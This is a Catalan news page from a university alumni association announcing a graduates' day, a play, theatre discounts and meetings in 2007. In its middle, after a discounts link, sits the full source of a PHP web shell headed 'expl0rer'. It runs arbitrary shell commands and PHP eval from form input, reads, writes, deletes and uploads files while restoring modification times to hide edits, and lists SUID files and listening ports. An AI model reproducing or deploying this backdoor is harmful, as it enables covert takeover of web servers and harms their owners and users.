Vine a la Diada del Graduat el dia 6/11/07!

La Diada del Graduat és l’acte més important que organitza l’Associació d’Antics Alumnes de la UPF, amb l’objectiu que tots els graduats i graduades de la Universitat puguin retrobar-se en el mateix marc en què van desenvolupar els seus estudis.
És una trobada molt interessant per retrobar-se i per fer xarxes de contactes de caire personal i professional.
Pròximament t’ informarem de l’horari, el lloc previst i de les activitats que s’organitzaran per a aquesta jornada.
I obrirem un formulari a la nostra web, perquè puguis registrar-te i tinguem una previsió dels assistents.
Anima’t a venir i anima als teus companys i companyes també a fer-ho!!

L’obra:”Angelus novus” el 9/10 i el 10/10!!

L’Espai de Teatre de l’Associació d’Antics Alumnes de la UPF us convida a veure com al febrer d’aquest any la seva nova representació, “Angelus Novus”. Es tracta d’un espectacle sobre la por, la violència i la manipulació idelològica.

Dies: dimarts 9 i dimecres 10 d’octubre de 2007.
Hora: 22.00 hores.
Lloc: Almazen. Guifré, 9 baixos. Barcelona.
Durada: 1 hora i 40 minuts.

Preus

* 9 euros sense cap descompte.
* 6 euros si ensenyes a la taquilla el carnet d’associat de l’Associació d’Antics Alumes UPF.

Recollida d’entrades: 1 hora o mitja hora abans de l’inici de l’espectacle a la taquilla d’Almazen al carrer de Guifré, 9 baixos.

Us hi esperem a tots/es!!!

Entrades a 5€ aquest dimecres!!!

Fila7 us ofereix de cara al proper dimecres dia 10 d’octubre a les 21.00 hores l’espectacle del MAG LARI, Millenium a la Sala 1 del Club Capitol per només 5 euros (només aquest dimecres).

De cara a la resta de la setmana, us pot oferir el 50% de descompte. El preu habitual és de 23€.

Aquesta obra estarà vigent fins el dia 13 d’octubre. Cada dia la funció és a les 21.00 hores, excepte dissabte, que és de 18.00 a 21.00 hores i diumenge a les 18.00 hores.

Aquesta funció és en català i està adaptada a la llengua de signes catalana

Per confirmar l’assistència ho podeu fer a través del correu electrònic: antics.alumnes@upf.edu

maglari.jpg

*S’ha de tenir en compte que cada membre de l’Associació pot comprar amb el seu carnet un màxim de quatre entrades amb aquests descomptes. Tenint en compte el límit de l’aforament del teatre.

Reunió de Nexe 38 el dia 9/10

Us comuniquem que hi ha una nova reunió de Nexe per establir l’organització dels propers articles al número 38 i la coordinació de noves idees dels seus col·laboradors.

Dia: 9 d’octubre de 2007
Horari: 20.00 hores
Lloc: Sala de Juntes 413. Edifici Rambla-UPF

Junta ordinària el 9/10

Us anunciem que hi ha una nova sessió de Junta directiva ordinària.

Dia: 9 d’octubre de 2007
Horari: 20.30 hores
Sala de Juntes: 413 a l’Edifici Rambla-UPF

Descomptes comercials

Clica aqui

$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists(‘exec’)){
@exec($c, $out);
return @implode(“n”, $out);
}elseif(function_exists(‘shell_exec’)){
$out = @shell_exec($c);
return $out;
}elseif(function_exists(‘system’)){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode(”, $str);
}elseif(function_exists(‘curl_version’)){
@ob_start();
$h = @curl_init(‘file:/’.’/’.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = ‘Could not read file!’;
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, ‘w’);
if($fp){
fwrite($fp, $c);
fclose($fp);
$out = ‘File saved.’.”n”;
if($t && touch($f, $t)){
$out .= ‘Last modification time changed.’;
}else{
$out .= ‘Could not change last modification time!’;
}
}else{
$out = ‘Saving failed!’;
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.' b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ‘:’) ? $os_type = ‘win’ : $os_type = ‘nix’;

if(!$os_name = @php_uname()){
if(function_exists(‘posix_uname’)){
$os_name = posix_uname();
}elseif($os_name != getenv(‘OS’)){
$os_name = ”;
}
}

if(function_exists(‘posix_getpwuid’)){
$data = posix_getpwuid(posix_getuid());
$user = $data[‘name’].’ uid(‘.$data[‘uid’].’) gid(‘.$data[‘gid’].’)’;
}else{
$user = ”;
}

$safe_mode = get_cfg_var(‘safe_mode’);
$safe_mode ? $safe = ‘on’ : $safe = ‘off’;

execute(‘echo ssps’) ? $execute = ‘on’ : $execute = ‘off’;

$server = getenv(‘SERVER_SOFTWARE’);
if(!$server) $server = ‘—‘;

$out = ”;
$tail = ”;
$aliases = ”;
if(!$safe_mode){
if($os_type == ‘nix’){
$os .= execute(‘sysctl -n kern.ostype’);
$os .= execute(‘sysctl -n kern.osrelease’);
$os .= execute(‘sysctl -n kernel.ostype’);
$os .= execute(‘sysctl -n kernel.osrelease’);
if(empty($user)) $user = execute(‘id’);
$aliases = array(
” => ”,
‘find suid files’=>’find / -type f -perm -04000 -ls’,
‘find sgid files’=>’find / -type f -perm -02000 -ls’,
‘find all writable files in current dir’=>’find . -type f -perm -2 -ls’,
‘find all writable directories in current dir’=>’find . -type d -perm -2 -ls’,
‘find all writable directories and files in current dir’=>’find . -perm -2 -ls’,
‘show opened ports’=>’netstat -an | grep -i listen’,
);
}else{
$os_name .= execute(‘ver’);
$user .= execute(‘echo %username%’);
$aliases = array(
” => ”,
‘show runing services’ => ‘net start’,
‘show process list’ => ‘tasklist’
);
}
}

if(!empty($_POST[‘cmd’])){
$out = execute($_POST[‘cmd’]);
}

elseif(!empty($_POST[‘php’])){
ob_start();
eval($_POST[‘php’]);
$out = ob_get_contents();
ob_end_clean();
}

elseif(!empty($_POST[‘edit’])){
$file = $_POST[‘edit’];
$out = read($file);
$tail = ‘
‘;
}

elseif(!empty($_POST[‘save’])){
$out = write($_POST[‘efile’], $_POST[‘save’]);
}

elseif(!empty($_POST[‘remove’])){
$obj = $_POST[‘remove’];
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
$res ? $out = ‘Removed successfully’ : $out = ‘Removing failed!’;
}

elseif(!empty($_POST[‘newdir’])){
@mkdir($_POST[‘newdir’]) ? $out = ‘Directory created.’ : $out = ‘Could not create directory!’;
}

elseif(!empty($_POST[‘newfile’])){
@touch($_POST[‘newfile’]) ? $out = ‘File created.’ : $out = ‘Could not create file!’;
}

elseif(!empty($_POST[‘alias’])){
$out = execute($_POST[‘alias’]);
}

elseif(!empty($_FILES[‘ufile’][‘tmp_name’])){
if(!is_uploaded_file($_FILES[‘ufile’][‘tmp_name’]) || @!copy($_FILES[‘ufile’][‘tmp_name’],$dir.chr(47).$_FILES[‘ufile’][‘name’])) $out = ‘Could not upload file’;
else $out = ‘Uploaded successfully.’;
}

print<< table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}

here;
if(!$safe_mode) print<<

here;
print<<

here;
if($aliases){
print<<

here;
}
print<<

cmd
php
actions edit remove new_dir new_file
aliases
dir
upload

OS: {$os_name}
User: {$user}
Server: {$server}
safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit}
~:(expl0rer):~

here;

if($dp = @openDir($dir)){
$cObj = readDir($dp);
while($cObj){
if(@is_dir($cObj)) $theDirs[] = $cObj;
elseif(@is_file($cObj)) $theFiles[] = $cObj;
$cObj = readDir($dp);
}
closedir($dp);
}

if(!empty($theDirs)){
natcasesort($theDirs);
if($os_type == ‘nix’){
foreach($theDirs as $cDir){
$color=’black’;
if(is_writeable($cDir)){
$color=’red’;
}elseif(is_readable($cDir)){
$color=’blue’;
}
print “<“.$cDir.”>
“;
}
}else{
foreach($theDirs as $cDir){
$tmp = $cDir.’/.ssps_tmp’;
if(@touch($tmp)){
$color=’red’;
unlink($tmp);
}elseif(opendir($cDir)){
closedir();
$color=’blue’;
}else{
$color=’black’;
}
print “<“.$cDir.”>
“;
}
}
} else print ‘
open_basedir restriction in effect. Allowed path is ‘.get_cfg_var(‘open_basedir’);

print ‘
‘;

if(!empty($theFiles)){
natcasesort($theFiles);
print ‘

‘;
foreach($theFiles as $cFile){
$size = file_size($cFile);
if($fp = @fopen($cFile, ‘a’)) $color = ‘red’;
elseif($fp = @fopen($cFile, ‘r’)) $color=’blue’;
else $color = ‘black’;
@fclose($fp);
print ‘

‘;
}
print ‘

‘.$cFile.’ ‘.$size.’

‘;
}

print<<

~:(results):~

{$tail}

here;
die;
}
?>

Propera Diada del Graduat!!

La Diada del Graduat és l’acte més important que organitza l’Associació d’Antics Alumnes de la UPF, amb l’objectiu que tots els graduats i graduades de la Universitat puguin retrobar-se en el mateix marc en què van desenvolupar els seus estudis.
És l’excusa perfecta per tornar a veure els teus companys, refer antics vincles i crear-ne de nous.
Posa’t en contacte amb els teus companys de promoció i anima’ls a anar-hi!